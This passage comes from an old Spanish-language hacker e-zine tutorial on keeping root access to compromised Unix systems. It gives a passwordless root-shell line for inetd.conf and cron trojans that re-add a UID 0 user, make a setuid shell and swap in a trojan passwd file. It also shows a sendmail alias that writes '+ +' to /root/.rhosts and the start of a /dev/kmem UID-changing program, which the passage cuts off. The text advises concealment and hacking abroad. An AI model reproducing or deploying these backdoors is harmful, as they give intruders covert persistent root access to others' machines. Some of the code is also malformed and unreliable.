<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 3: Protocolo. Siempre
es TCP o UDP</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 4: Cuanto tiempo
se tiene ke retrasar la conexion.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 5: Usuario kon el
ke se ejecuta el demonio (se usa para los permisos</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;
uid/gid etc ...)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 6: Ke programa va
a mantener la conexion</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 7: Comando o demonio</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ok, osea que, segun la linea
anterior, Cuando alguien haga un telnet al puerto 21 de esta makina,va
a tener una conexion stream/tcp y no va a esperar nada. Ademas, el usuario,
como root, va a ejecutar sobre /usr/libexec/tcpd el comando ftpd (demonio
de FTP en este caso).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ya ke sabemos lo ke significa
esto, instalemos lo ke nos falta de nuestra backdoor, haber .... keremos
ke kuando konectemos al puerto 26 se ejecute un shell, osea /bin/sh no?,
vale, estamos deacuerdo, ademas, no keremos ke espere nada, osea, ke nos
deje entrar nada mas conectar, por supuesto, la shell la tiene ke ejecutar
como root si no, pierde casi toda la gracia, lo</font></font>
<br><font face="Arial,Helvetica"><font size=-1>ultimo es ver el tipo de
conexion, pues es stream/tcp, si eres un poco 'curiosillo' (Cosa muy importante
en esta 'profesion' :) te preguntaras por que?, pos no te lo voy a decir
(porque no lo se :), pero bueno ... tu hazme caso y ya esta, si alguien
me kiere escribir para explicarmelo, se lo agradeceria mucho. Bueno, dejemosnos
de rollo, la linea es:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>fwalld&nbsp;&nbsp;&nbsp;&nbsp;
stream/tcp&nbsp;&nbsp;&nbsp; nowait root&nbsp; /bin/sh sh -i</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Esta linea la meteis por
enmedio del /etc/inetd.conf y no canta musso.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>Ahora reseteais el inetd
pa ke koja los 'educativos' cambios. :) . Esto lo haceis asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;#killall -1 inetd=20</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;o</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;# ps ax|grep inetd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;{mira el pid del inetd}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;#kill -9 pid_del_inetd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;#inetd</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Haz ps y asegurate ke se
ha reiniciado, ya ke lo ke haces es matar el inetd (nadie se podra conectar)
y despues volverlo a ejecutar. Pos ya ta!!! Ya ta instalada.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ahora probad la backdoor
accediendo como usuario normal:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;$telnet localhost 26</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;#</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Mejoras para esta backdoor:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Lo malo de esta backdoor,
es ke kualkier otro puede hacer telnet a ese puerto y entrar como root,
ya ke no existe password, bueno ...., puedes poner que se ejecute, en vez
de una shell, un demonio creado por ti y ke pida password (el kual solo
lo sabras tu). Otra posibilidad es ke, en vez de ejecutar /bin/sh, pongas
un sushi como el del aparatado anterior y entonces,</font></font>
<br><font face="Arial,Helvetica"><font size=-1>no resaltara tanto ya ke
no pondra el /bin/sh, (Mi 'sushi seguro' no funciona en este caso), la
verdad es ke tampoco hace falta ke sea un sushi, kon ke solo copies el
shell basta, no hace falta ke le des permisos</font></font>
<br><font face="Arial,Helvetica"><font size=-1>especiales. La linea kedaria&nbsp;
asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>fwalld stream/tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nowait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp; /bin/fwalld fwalld</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ya resalta menos.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Si alguien realiza un servidor
ke pida un password exclusivo (sin ke este en el /etc/passwd y sin modificar
el login) antes de ejecutar una shell ke me lo mande.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">5
- CRONos&nbsp;</font></b> I,&nbsp; el root del tiempo XDDDDD</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Los troyanos del cron son
buenos para mantener el acceso como root en un sistema si el administrador
legal (o otro 'no legal' :) nos kita el acceso.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>El Cron es un demonio 'temporal',
osea, se encarga de hacer ke el sistema ejecute la orden ke tu kieras kuando
kieras :). Escribe crontab en el shell, entonces te mostrara como introducir,
ejecutar y kitar crons. El fichero de configuracion es&nbsp; /var/spool/cron/crontabs/root
(no en todos los sistemas esta ahi, pero bueno... molestate en buscarlo).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Asi es como es el fichero
de configuracion:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
/usr/bin/updatedb</font></font>
<br><font face="Arial,Helvetica"><font size=-1>[1]&nbsp;&nbsp;&nbsp;&nbsp;
[2]&nbsp;&nbsp;&nbsp;&nbsp; [3]&nbsp;&nbsp;&nbsp;&nbsp; [4]&nbsp;&nbsp;&nbsp;&nbsp;
[5]&nbsp;&nbsp;&nbsp;&nbsp; [&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
]</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp; 1: minuto, 0-59</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 2: hora, 0-23</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 3: dia del mes, 1-31</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 4: mes del a=F1o,
1-12</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 5: dia de la semana,
0-6</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 6: comando a ejecutar</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Este cron se ejecutara todos
los lunes a las 00:00. Para modificar el Cron para ke haga algo 'educativo'&nbsp;
solo tienes ke a&ntilde;adir una linea en el fichero /var/spool/crontab/root.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Por ejemplo, si, para simplificar
tus accesos metes un usuario de UID 0 en el /etc/passwd, puedes meter un
cron ke compruebe si el administrador (el legal o no) ha kitado ese usuario
ke usabas.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Por ejemplo, lo programas
para ke se ejecute todos los sabados a las 00:00 (asi puedes acceder a
ese sistema durante el fin de semana). Esto se hace a&ntilde;adiendo al
/var/spool/crontab/root la linea:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
/usr/bin/revive.sh</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Copia este programa en el
directorio /usr/bin (o donde kieras), recuerda en cambiarle el nombre para
ke no kante mucho:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>revive.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>---------</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/revive.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#!/bin/sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#Is YourUser still on the
system?&nbsp; Let's make sure he is.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#daemon9@netcom.com</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>set evilflag = (`grep YourUser
/etc/passwd`)</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>if($#evilflag == 0) then&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# Is he there?</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
set linecount = `wc -l /etc/passwd`</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
cd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# Do this at home.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
cp /etc/passwd ./temppass&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# Safety first.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
@ linecount[1] /= 2</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
@ linecount[1] += 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# we only want 2 temp files</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
split -$linecount[1] ./temppass&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# passwd string option</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
cat ./xab >> ./xaa</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
mv ./xaa /etc/passwd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
chmod 644 /etc/passwd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# or whatever it was</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
#beforehand</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
rm ./xa* ./temppass</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
echo Done...</font></font>
<br><font face="Arial,Helvetica"><font size=-1>else</font></font>
<br><font face="Arial,Helvetica"><font size=-1>endif</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>*** NOTE : MODIFY "YOURUSER"
!!</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Este programa chekea si esta
nuestro usuario en el fichero de password, si no esta, lo vuelve a meter
sin password. Por favor, no seas tan lamer de dejarlo sin password, ke
he visto a mas de uno asi.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Otra posibilidad es ke ponga
un sushi cada cierto tiempo:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>dead.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>-------</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/dead.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#!/bin/sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1># Everyone's favorite...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>cp /bin/csh /tmp/.yourlittleshell&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# Don't name it that...</font></font>
<br><font face="Arial,Helvetica"><font size=-1>chmod 4755 /tmp/.yourlittleshell</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Mejoras: Usa tu imaginacion,
hay MILLONES de posibilidades, te muestro ahora</font></font>
<br><font face="Arial,Helvetica"><font size=-1>otro CRON cojonudo,pero
el Cron, no tiene limites :).</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>6-
CRONos II.</font></font></font></b><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Este Cron, para mi, es uno
de los mejores,&nbsp; lo ke hace es, kopiar el fichero de password y despues
poner como fichero de password otro personal durante un corto espacio de
tiempo (1 minuto por ejemplo), asi, solo tu podras entrar a la hora ke
lo pongas, las 4:30 de la madrugada es buena hora (ATENCION!!! ten en cuenta
ke me refiero 4:30 hora de donde este la makina, ke lo mas posible es ke
si estas hackeando fuera de Espa~a ,cosa ke deberias hacer, la hora no
sea la misma, enterate de la diferencia horaria, con el comando time ves
la hora de alli). Bueno aki pongo el cron:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
29&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /bin/usr/.hiden</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Pa el siguiente cron, crea
un fichero de password personal /var/spool/mail llamado .sneaky (o como
sea)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Pon en este porgrama en /bin/usr
(o donde kieras :)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>.hidden</font></font>
<br><font face="Arial,Helvetica"><font size=-1>-------</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/.hidden</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#!/bin/sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1># Install trojan /etc/passwd
file for one minute</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#daemon9@netcom.com</font></font>
<br><font face="Arial,Helvetica"><font size=-1>cp /etc/passwd /etc/.temppass</font></font>
<br><font face="Arial,Helvetica"><font size=-1>cp /var/spool/mail/.sneaky
/etc/passwd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>sleep 60</font></font>
<br><font face="Arial,Helvetica"><font size=-1>mv /etc/.temppass /etc/passwd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>7- Sendmail</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Edita el fichero /etc/aliases
a~ade esta linea:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>decode: |/usr/bin/uudecode</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>asegurate de ocultarla bien
en el fichero.&nbsp; El fichero uudecode es un script :).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Aki tienes el script:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>uudecode.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>-----------</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/uudecode.sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#!/bin/sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1># Create our .rhosts file.&nbsp;
Note this will output to stdout.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>echo "+ +" > tmpfile</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/usr/bin/uuencode tmpfile
/root/.rhosts</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ok, Manda mail a decode,
en el subjet metes la version uuencodeada del .rhosts.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>echo "+ +" | /usr/bin/uuencode
/root/.rhosts | mail decode@victimserver.com</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp; Puedes a~adir cualkier
programa de los listados de antes (los diferentes CRONs) para ke sean ejecutados
por el alias. Se imaginativo.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;*NOTA: Esta backdoor
a mi no me funciona en mi linux. No la he probado en ningun otro sitio.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>Yo la pongo por si acaso......</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">8-</font></b>
Esta es experimental, al parecer en algunos sistemas (sobre todo linux)
cuando alguien tiene un uid/gid erroneo en el /etc/passwd, el login le
pone uid/gid 0, osea root.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ejemplo:</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;rmartin:x:x50:50:R.
Martin:/home/rmatin:/bin/bash</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">9-
/dev/kmem</font></b>. Te imaginas poder acceder a memoria para cambiar
tu UID?? , por bien sencillo ke es..., lo unico ke tienes ke hacer es,
como root, dejar /dev/kmem para ke se pueda leer y escribir siendo kien
kiera ke seas, (aparte de cambiar el UID eso sirve para muuuuuuuchas mas
cosas). Bien, el resto lo hace este programa:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/kmemrd.c</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* If /kmem is is readable
and writable, this program will change the user's</font></font>
<br><font face="Arial,Helvetica"><font size=-1>UID and GID to 0.&nbsp;
*/</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* This code originally
appeared in "UNIX security:</font></font>
<br><font face="Arial,Helvetica"><font size=-1>A practical tutorial" with
some modifications by daemon9@netcom.com */</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#define KEYWORD "nomenclature1"</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>struct user userpage;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>long address(), userlocation;</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>int main(argc, argv, envp)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>int argc;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>char *argv[], *envp[];{</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
int count, fd;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
long where, lseek();</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(argv[1]){&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* we've got
an argument, is it the keyword? */</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(!(strcmp(KEYWORD,argv[1]))){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
fd=(open("/dev/kmem",O_RDWR);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(fd&lt;0){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Cannot read or write to /dev/kmem\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
perror(argv);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(10);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
userlocation=address();</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
where=(lseek(fd,userlocation,0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(where!=userlocation){</font></font>
